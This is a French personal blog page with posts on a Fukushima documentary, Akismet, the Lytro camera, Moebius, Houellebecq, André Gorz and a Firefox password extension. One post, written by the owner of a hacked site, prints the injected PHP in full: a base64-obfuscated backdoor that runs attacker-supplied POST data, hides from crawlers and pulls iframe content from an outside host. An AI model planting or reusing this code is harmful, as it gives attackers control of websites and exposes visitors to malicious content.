Enquête sur une supercatastrophe nucléaire

fukushima Fukushima, c’était il y a un an, le 11 mars 2011. Un reportage sur Arte intitulé « Enquête sur une supercatastrophe nucléaire » retraçait tout ce qui s’est passé dans la centrale au moment de la catastrophe, avis d’experts internationaux à l’appui, puis comment le gouvernement et Tepco ont géré la chose via les médias… Finalement, les deux parties du reportage sont aussi inquiétantes l’une que l’autre.

La première partie est donc consacrée à l’événement lui-même : tremblement de terre suivi d’un tsunami qui endommagent sévèrement la centrale. C’est le début d’une série moire : l’alimentation des réacteurs 1, 2 et 3 est interrompue. Quelques minutes plus tard, des masses d’eau emportent les réservoirs de fioul du groupe électrogène. C’est le black-out complet dans la centrale. Une heure plus tard, c’est le circuit de refroidissement des réacteurs 1 et 2 qui est défaillant. La supercatastrophe est inéluctable, plus rien ne peut l’arrêter.

Que l’on se retrouve sans eau ni électricité sur ce type de centrale était inimaginable.

Ensuite, ce ne sera plus qu’une course pour empêcher que la catastrophe ne devienne encore plus grave… Mais comme le dit Wolfgang Kromp de l’Institut des sciences de la sécurité et des risques nucléaires :

L’erreur fatale, c’est d’installer une centrale nucléaire sur une faille sismique. […] La politique nucléaire du Japon est irresponsable.

La deuxième partie porte sur le traitement médiatique, les explications fournies par Tepco ou le gouvernement, toujours pour rassurer et dédramatiser, quitte à nier l’évidence. Les journalistes ne respectant pas cette ligne seront systématiquement écartés. À l’international, le lobby nucléaire (Areva, General Electric, Westinghouse) œuvre dans le même sens. On peut parler d’un complexe médiatico-nucléaire.

Un bel exemple de manipulation médiatique en tout cas. Mais si les médias préfèrent minimiser le problème, c’est le contraire que nous apprend ce reportage. Le Japon est bel et bien passé tout près d’une catastrophe qui l’aurait littéralement coupé en deux.

Et si le pire n’est pas arrivé, les prochaines décennies pourraient voir venir de l’ordre d’un million de personnes atteintes de cancer…

Continuer la lecture… Enquête sur une supercatastrophe nucléaire

Akismet ne fonctionne plus chez Free

Akismet Laisser les commentaires ouverts sur le blog, cela veut dire recevoir plein de spams.

J’utilise pour le filtrage le plugin Akismet qui fonctionne plutôt pas mal, qui est gratuit pour les particuliers, et fournit par défaut avec WordPress.

Le principe est simple : à chaque commentaire, il se connecte sur un de leurs serveurs pour une série de tests, et renvoie une réponse positive ou négative. Jusque là tout va bien.

J’avais toutefois pas mal de confirmation à faire manuellement (une vingtaine par jour) : commentaires détectés comme suspects par Akismet, mais qui n’ont pas pu être vérifiés, probablement parce que le serveur n’a pas pu être contacté à ce moment là. Ce qui donne ce message dans le panneau d’admin wordpress :

Donc ce matin, j’ai voulu mettre à jour le plugin à la dernière version 2.5.5 (j’étais en 2.5.3) voyant qu’ils avaient amélioré cette partie :

Add more checks on the scheduled re-check feature, force it to be no more than 20 minutes in the future.

Hélas, impossible de réactiver le plugin, et les spams commencent à tomber :
commentaire

Il était urgent de faire quelque chose !

Continuer la lecture… Akismet ne fonctionne plus chez Free

Lytro

L'appareil photo lytro Voilà une nouvelle technologie photo impressionnante : plus besoin de faire la mise au point au moment de la prise de vue, vous la ferez plus tard !

Bon l’appareil n’est pas donné (400 $), et le logiciel fourni (et nécessaire) pour traiter l’image n’existe que pour Mac (une version Windows est en cours)… mais quand même !

Techniquement, un zoom 8x à focale constante (f/2), et si j’ai bien compris un calculateur qui capture les rayons lumineux de la scène dans toutes les directions (« the light field »), soit beaucoup plus d’informations que ce que font les appareils photos d’aujourd’hui.

Démonstration (cliquer sur l’image à l’endroit où vous souhaitez la netteté, double-click pour zoomer) :

Pas mal, non ? d’autres exemples sont disponibles ici.

Moebius redux

moebius Très bon reportage hier soir sur Arte : Moebius redux (de Hasko Baumann), retraçant la vie de Jean Giraud alias Gir alias Moebius, qui nous a quitté le 10 mars dernier.

Un portrait passionnant, entrecoupé d’illustrations du « maître », mais aussi d’extraits de films (Alien, Tron) auxquels Moebius a participé, et enfin d’interviews des principaux artistes avec qui il a travaillé : Druillet, Jodorowsky, Stan Lee ou Enki Bilal.

Hélas, pas de rediffusion de prévue.

Continuer la lecture… Moebius redux

La carte et le territoire – Michel Houellebecq

La carte et le territoire - Michel Houellebecq C’est le premier roman de Houellebecq que je lis, et ce grâce aux amis qui me l’ont offert pour mon anniversaire. L’un d’entre eux ne tarit d’ailleurs pas d’éloges sur ses romans, et prédit qu’il deviendra un auteur classique dans le futur.

On rentre très facilement dans l’histoire, celle de Jed, artiste peintre qui va rencontrer un certain succès, une très jolie femme, Houellebecq lui-même (et même Frédédric Beigbeder, tous deux mis en scène dans le roman).

Le style est fluide, sans fioritures et agréable à lire, l’auteur s’amusant tout de même parfois, comme ici lors de la visite d’un agent immobilier :

Jed craignit un instant qu’il ne se proclamât solidaire des artistes authentiques contre les bobos et autres philistins du même ordre, qui faisaient monter les prix, interdisant ainsi les ateliers d’artistes aux artistes, et comment faire n’est-ce pas je ne peux pas aller contre la vérité du marché ce n’est pas mon rôle, mais heureusement cela ne se produisit pas.

Si Houellebecq s’invite dans l’histoire, il ne se donne pas un très beau rôle, voir pas de rôle du tout, c’est peut-être lui tout simplement. Mais que ce soit l’auteur par l’entremise de Jed, ou le personnage de Houellebecq, tous deux dressent une vision assez désabusée de notre monde.

Jed va connaître le succès avec une série de toiles dont le thème est « Les métiers », autant d’occasions d’évoquer les transformations de notre monde. C’est assez bien vu, bien documenté, chaque tableau donnant autant d’occasion de parler du monde et de ses changements. Ce n’est en aucune façon une critique de l’art en lui-même, et Jed artiste est parfaitement crédible, c’est plutôt le monde (y compris celui de l’art) autour de lui qui pose problème.

La seconde partie du livre se transforme en une enquête policière menée par un policier désabusé, autre occasion de montrer l’état de notre société, mais à laquelle j’ai eu un peu plus de mal à accrocher. Heureusement, les rapports entre Jed et son père, proche de la mort, permettent de garder l’intérêt éveillé.

Au final un bon roman, agréable à lire, décrivant un monde qui ne sait plus trop où il va. Dommage à mon sens qu’il se soit senti obligé de s’y inviter ainsi que Beigbeder… cela n’apporte rien, fait très « milieu parisien », celui-là même que Houellebecq ne doit pas trop aimer.

Autres articles sur le blog à propos de Michel Houellebecq :

Michel Houellebecq (né Michel Thomas à La Réunion en 1956), est l’un des auteurs contemporains de la langue française les plus connus et traduits dans le monde. Révélé par « Extension du domaine de la lutte » (1994) et surtout « Les particules élémentaires » (1998). Élevé d’abord par ses grands-parents maternels en Algérie, il est confié à six ans à sa grand-mère paternelle Henriette, communiste, dont il adoptera le nom de jeune fille comme patronyme.

L’écologie politique par André Gorz

André Gorz André Gorz (philosophe et journaliste) est le théoricien de l’écologie politique. Il annonçait à la fin de sa vie (2007) que la sortie du capitalisme avait commencé. Le Canard enchaîné en avait parlé, et j’avais fait un article sur le blog. Depuis, la crise économique est là, et on peut se demander s’il n’avait pas raison…

L’été dernier, Daniel Mermet (France Inter – Là-bas si j’y suis) proposait deux émissions autour d’extraits d’interviews d’André Gorz diffusées sur France culture (1991). L’invité était Christophe Fourel, auteur d’un livre intitulé : André Gorz, un penseur pour le XXIe siècle ?.

L’écologie, après Fukushima, avec l’extraction du gaz de schiste, l’épuisement des ressources de la planète, les changements climatiques, devrait nous interpeller. Les faits (et les effets) s’accumulent. Et pourtant, la candidate des Verts aux élections présidentielles ne fait pas recette dans les sondages. Alors pourquoi ?

En écoutant André Gorz (magie de la radio), on va comprendre ce que signifie réellement l’écologie politique : un véritable changement de paradigme dans l’organisation de notre société, en d’autres termes la fin de la société de consommation. On comprend que cela en effraie plus d’un (et pour différentes raisons).

Mais pas seulement : il va d’abord nous parler de son enfance, de sa difficulté à s’identifier, de sa rencontre avec Jean-Paul Sartre et comment il a pu enfin pouvoir dire JE, c’est-à-dire penser par lui-même. Autodidacte, philosophe, intellectuel : s’il n’a jamais été très médiatisé, c’est à la fois parce qu’il ne recherchait pas la lumière des plateaux, mais peut-être aussi par sa contestation radicale, ainsi qu’il l’explique lui-même :

Je n’ai pas les moyens constitutionnels, si vous voulez psychiques, spirituels, pour avoir une volonté de puissance, sauf le pouvoir que vous donne la contestation. J’estime d’ailleurs que le rôle des intellectuels au sens traditionnel du terme (pas au sens que cela a pris aujourd’hui), c’est de contester. Le radicalisme dans la pensée consiste en la contestation radicale, mais la contestation radicale a besoin de critères.

Personnage à  part, il mérite d’être écouté… ou lu. J’ai donc retranscrit ses propos, ceux de la première émission, et l’article est déjà long… j’essaierai de faire de même pour la seconde.

Continuer la lecture… L’écologie politique par André Gorz

Attaque de type eval(base64_decode) sur le blog

Hier matin, le blog affichait en haut de page un beau message d’erreur. C’est Merlinux qui m’a prévenu par mail, car de mon côté tout était normal, alors que lui voyait le message suivant :

accès au blog impossible

Après quelques vérifications, je me suis alors rendu compte que le fichier index.php (à la racine du site ET à la racine de wordpress) avaient été modifiés et comprenaient l’instruction suivante :

<?php /*68066*/ error_reporting(0); @ini_set('error_log',NULL);
@ini_set('log_errors',0); @ini_set('display_errors','Off'); 
@eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pd
CgwKTsKaWYgKGlzc2V0KCRfUE9TVFsnY29va2llc19pJ10pKSB7ZXZhbChiYXNlNjR
fZGVjb2RlKCRfUE9TVFsnY29va2llc19pJ10pKTt9CiR6Mzc9InN0YXRzIjsKJHVhM
z0kX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl07CiR1MzcgPSBhcnJheSgiR29vZ2x
lIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiU
mFtYmxlciIsICJNYWMiKTsKaWYoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCI
sICR1MzcpIC4gIi9pIiwgJHVhMykpIG9yIChpc3NldCgkX1NFUlZFUlsiSFRUUF9VU
0VSX0FHRU5UIl0pID09MCkgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX0NPT0tJRSJ
dKSkpCnt9CmVsc2UKewpAc2V0Y29va2llKCR6MzcsbWQ1KCJzdGF0cyIpLHRpbWUoK
SsxNzI4MDApOwokaWQ9IjlvOGFhODhsOGVqaTEycmpmNWtva2VteGZ5amx6MXQiOwo
kdXJsPSJodHRwOi8vaWZyYW1lc2hvcC5uZXQvc3RpLnBocD9pZD0iLiRpZDsKJGlmc
mFtZT1AZmlsZV9nZXRfY29udGVudHMgKCR1cmwpOwppZiAoJGlmcmFtZSkgZWNobyg
kaWZyYW1lKTsgCn0K'));/*68066*/ ?>

Mais qu’est-ce que ça veut dire ? Pour décoder tout ça, il suffit d’aller sur ce site et d’y entrer le contenu de la chaîne codée. Et on y retrouve bien l’URL du message d’erreur :

error_reporting(0); set_time_limit(0); 
if (isset($_POST['cookies_i'])) {eval(base64_decode($_POST['cookies_i']));} $z37="stats"; $ua3=$_SERVER["HTTP_USER_AGENT"]; 
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Mac"); 
if((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_SERVER["HTTP_USER_AGENT"]) ==0) or (isset($_SERVER["HTTP_COOKIE"]))) {} else { @setcookie($z37,md5("stats"),time()+172800); $id="9o8aa88l8eji12rjf5kokemxfyjlz1t"; 
$url="http://iframeshop.net/sti.php?id=".$id; $iframe=@file_get_contents ($url); 
if ($iframe) echo($iframe); } 

Bon, en gros cela injecte une iframe dans ma page (une page dans la page). Pour quoi faire je n’en sais rien, peut-être simplement afficher de la publicité, ou pire installer un malware sur le PC ? En tout cas des petits malins qui ont probablement exploité une faille de sécurité.

Bon j’ai nettoyé les deux fichiers, changé le mot de passe FTP, tout est rentré dans l’ordre. Pas sûr que cela soit suffisant, il est possible que cela revienne si c’est une faille de sécurité de WordPress (v3.2.1). C’est peut-être aussi le serveur de Free qui n’est pas assez sécurisé, autorisant ce genre « d’exploit ». Free est pourtant assez restrictif pour sécuriser leurs serveurs…

Bref, on voit toute la difficulté de se protéger contre les attaques de ce genre. Attendons de voir la suite, pour l’instant tout va bien, les fichiers n’ont pas été réinfectés. Je vais les surveiller pendant quelques jours pour m’en assurer.

Password Reuse Visualizer

Voilà une extension Firefox qui peut nous permettre de prendre conscience d’un problème potentiel de sécurité : celui d’utiliser toujours le même mot de passe pour les sites web où l’on doit s’identifier, et pour qui nous avons demandé à Firefox de les mémoriser.

L’extension Password Reuse Analyzer vous affiche graphiquement le résultat en analysant leurs ressemblances : ci-contre mon résultat, pas fameux en terme de sécurité, puisque l’on voit que j’utilise principalement deux mots de passes, dont un avec quelques variantes. L’extension est aussi capable de vous afficher les mots de passe en clair… Attention donc si plusieurs personnes utilisent le même ordinateur (en même temps, cela peut-être très pratique !).

En bleu, ce sont les sites, dont l’adresse s’affiche au survol de la souris. En vert les mots de passe. Les carrés orange relient deux mots de passe très proches. Une fois l’extension installée, il suffit de cliquer sur la petit cadenas dans la barre des modules de Firefox :

Pour certains sites où l’on stocke peu d’informations personnelles (forums par exemple), utiliser le même mot de passe n’est pas vraiment un problème à mon avis. Pour des sites plus critiques, ça vaut peut-être le coup de se casser un peu la tête… Cette extension peut nous aider à y voir plus clair ! 😉

Lectures, Ubuntu, Smartphone, Cinéma, entre autres…